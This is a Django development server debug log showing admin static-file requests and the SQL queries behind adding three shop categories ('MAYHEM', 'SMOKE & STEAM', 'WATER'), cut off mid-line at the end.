[07/Dec/2019 13:12:42] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 200 85692 [07/Dec/2019 13:12:42] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 200 86184 Not Found: /favicon.ico [07/Dec/2019 13:12:42] "GET /favicon.ico HTTP/1.0" 404 6629 [07/Dec/2019 13:12:42] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 200 331 [07/Dec/2019 13:12:42] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 200 380 DEBUG 2019-12-07 13:12:47,698 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:47.682504+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 47, 682504, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:47,703 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:12:47,708 utils 32196 139885061072640 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:12:47,710 utils 32196 139885061072640 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_category"; args=() DEBUG 2019-12-07 13:12:47,719 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC, "shop_category"."id" DESC; args=() DEBUG 2019-12-07 13:12:47,853 utils 32196 139885061072640 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:12:47.850136+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 12, 47, 850136, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:12:47] "GET /shop/category/ HTTP/1.0" 200 4739 [07/Dec/2019 13:12:48] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 [07/Dec/2019 13:12:48] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 DEBUG 2019-12-07 13:12:48,404 utils 32196 139885050582784 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:48.390078+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 48, 390078, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:48,408 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:12:48] "GET /jsi18n/ HTTP/1.0" 200 3223 [07/Dec/2019 13:12:48] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [07/Dec/2019 13:12:48] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [07/Dec/2019 13:12:48] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [07/Dec/2019 13:12:48] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [07/Dec/2019 13:12:48] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [07/Dec/2019 13:12:48] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [07/Dec/2019 13:12:48] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [07/Dec/2019 13:12:50] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 DEBUG 2019-12-07 13:12:54,181 utils 32196 139885050582784 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:54.165702+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 54, 165702, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:54,185 utils 32196 139885050582784 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:12:54,200 utils 32196 139885050582784 (0.001) SELECT "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_content_type" WHERE ("django_content_type"."app_label" = 'shop' AND "django_content_type"."model" = 'category'); args=('shop', 'category') DEBUG 2019-12-07 13:12:54,263 utils 32196 139885050582784 (0.003) DECLARE "_django_curs_139885050582784_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:12:54,316 utils 32196 139885050582784 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:12:54.313677+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 12, 54, 313677, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:12:54] "GET /shop/category/add/ HTTP/1.0" 200 6730 [07/Dec/2019 13:12:54] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 DEBUG 2019-12-07 13:12:54,643 utils 32196 139885050582784 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:12:54.633768+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 12, 54, 633768, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:12:54,646 utils 32196 139885050582784 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:12:54] "GET /jsi18n/ HTTP/1.0" 200 3223 [07/Dec/2019 13:12:54] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [07/Dec/2019 13:12:54] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [07/Dec/2019 13:12:55] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 DEBUG 2019-12-07 13:14:12,525 utils 32196 139885061072640 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:12.515610+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 12, 515610, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:12,529 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:14:12,628 utils 32196 139885061072640 (0.002) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'MAYHEM' LIMIT 1; args=('MAYHEM',) DEBUG 2019-12-07 13:14:12,634 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'MAYHEM' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('MAYHEM',) DEBUG 2019-12-07 13:14:12,637 utils 32196 139885061072640 (0.002) SELECT MAX("shop_category"."tree_id") AS "tree_id__max" FROM "shop_category"; args=() DEBUG 2019-12-07 13:14:12,646 utils 32196 139885061072640 (0.003) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('MAYHEM', NULL, 'categories/2019/12/07/collection3.png', 'MAYHEM', 'mayhem', 1, 2, 2, 0) RETURNING "shop_category"."id"; args=('MAYHEM', None, 'categories/2019/12/07/collection3.png', 'MAYHEM', 'mayhem', 1, 2, 2, 0) DEBUG 2019-12-07 13:14:12,648 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:14:12.647108+00:00'::timestamptz, 6, 8, '3', 'MAYHEM', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 14, 12, 647108, tzinfo=), 6, 8, '3', 'MAYHEM', 1, '[{"added": {}}]') [07/Dec/2019 13:14:12] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:14:12,907 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:12.896830+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 12, 896830, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:12,910 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:14:12,974 utils 32196 139885061072640 (0.003) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:14:13,018 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:14:13.015561+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 14, 13, 15561, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:14:13] "GET /shop/category/add/ HTTP/1.0" 200 6980 DEBUG 2019-12-07 13:14:13,328 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:13.314066+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 13, 314066, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:13,332 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:14:13] "GET /jsi18n/ HTTP/1.0" 200 3223 [07/Dec/2019 13:14:13] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 DEBUG 2019-12-07 13:14:39,641 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:39.630629+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 39, 630629, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:39,645 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:14:39,652 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'SMOKE & STEAM' LIMIT 1; args=('SMOKE & STEAM',) DEBUG 2019-12-07 13:14:39,656 utils 32196 139885061072640 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'SMOKE & STEAM' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('SMOKE & STEAM',) DEBUG 2019-12-07 13:14:39,658 utils 32196 139885061072640 (0.001) SELECT MAX("shop_category"."tree_id") AS "tree_id__max" FROM "shop_category"; args=() DEBUG 2019-12-07 13:14:39,661 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('SMOKE & STEAM', NULL, 'categories/2019/12/07/collection4.png', 'SMOKE & STEAM', 'smoke-steam', 1, 2, 3, 0) RETURNING "shop_category"."id"; args=('SMOKE & STEAM', None, 'categories/2019/12/07/collection4.png', 'SMOKE & STEAM', 'smoke-steam', 1, 2, 3, 0) DEBUG 2019-12-07 13:14:39,663 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:14:39.662334+00:00'::timestamptz, 6, 8, '4', 'SMOKE & STEAM', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 14, 39, 662334, tzinfo=), 6, 8, '4', 'SMOKE & STEAM', 1, '[{"added": {}}]') [07/Dec/2019 13:14:39] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:14:39,925 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:39.910002+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 39, 910002, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:39,929 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:14:40,001 utils 32196 139885061072640 (0.003) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:14:40,049 utils 32196 139885061072640 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:14:40.047243+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 14, 40, 47243, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:14:40] "GET /shop/category/add/ HTTP/1.0" 200 7040 DEBUG 2019-12-07 13:14:40,357 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:14:40.342571+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 14, 40, 342571, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:14:40,361 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:14:40] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:15:06,383 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:06.371302+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 6, 371302, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:06,387 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:06,397 utils 32196 139885061072640 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."name" = 'WATER' LIMIT 1; args=('WATER',) DEBUG 2019-12-07 13:15:06,402 utils 32196 139885061072640 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE ("shop_category"."name" > 'WATER' AND "shop_category"."parent_id" IS NULL) ORDER BY "shop_category"."name" ASC, "shop_category"."tree_id" ASC LIMIT 1; args=('WATER',) DEBUG 2019-12-07 13:15:06,404 utils 32196 139885061072640 (0.001) SELECT MAX("shop_category"."tree_id") AS "tree_id__max" FROM "shop_category"; args=() DEBUG 2019-12-07 13:15:06,408 utils 32196 139885061072640 (0.001) INSERT INTO "shop_category" ("name", "parent_id", "image", "description", "slug", "lft", "rght", "tree_id", "level") VALUES ('WATER', NULL, 'categories/2019/12/07/collection5.png', 'WATER', 'water', 1, 2, 4, 0) RETURNING "shop_category"."id"; args=('WATER', None, 'categories/2019/12/07/collection5.png', 'WATER', 'water', 1, 2, 4, 0) DEBUG 2019-12-07 13:15:06,411 utils 32196 139885061072640 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-07T13:15:06.409469+00:00'::timestamptz, 6, 8, '5', 'WATER', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 7, 13, 15, 6, 409469, tzinfo=), 6, 8, '5', 'WATER', 1, '[{"added": {}}]') [07/Dec/2019 13:15:06] "POST /shop/category/add/ HTTP/1.0" 302 0 DEBUG 2019-12-07 13:15:06,675 utils 32196 139885061072640 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:06.660549+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 6, 660549, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:06,678 utils 32196 139885061072640 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-07 13:15:06,753 utils 32196 139885061072640 (0.003) DECLARE "_django_curs_139885061072640_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-07 13:15:06,812 utils 32196 139885061072640 (0.005) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-21T13:15:06.805708+00:00'::timestamptz WHERE "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 21, 13, 15, 6, 805708, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') [07/Dec/2019 13:15:06] "GET /shop/category/add/ HTTP/1.0" 200 7065 DEBUG 2019-12-07 13:15:07,120 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:07.108339+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 7, 13, 15, 7, 108339, tzinfo=), '8ojyyz7puuibh7rtqntt8ci0gyabthm9') DEBUG 2019-12-07 13:15:07,124 utils 32196 139885061072640 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [07/Dec/2019 13:15:07] "GET /jsi18n/ HTTP/1.0" 200 3223 DEBUG 2019-12-07 13:15:29,913 utils 32196 139885061072640 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-07T13:15:29.900822+00:00'::timestamptz AND "django_session"."session_key" = '8ojyyz7puuibh7rtqntt8ci0gyabthm9'); args=(datetime.datetime(2019, 12, 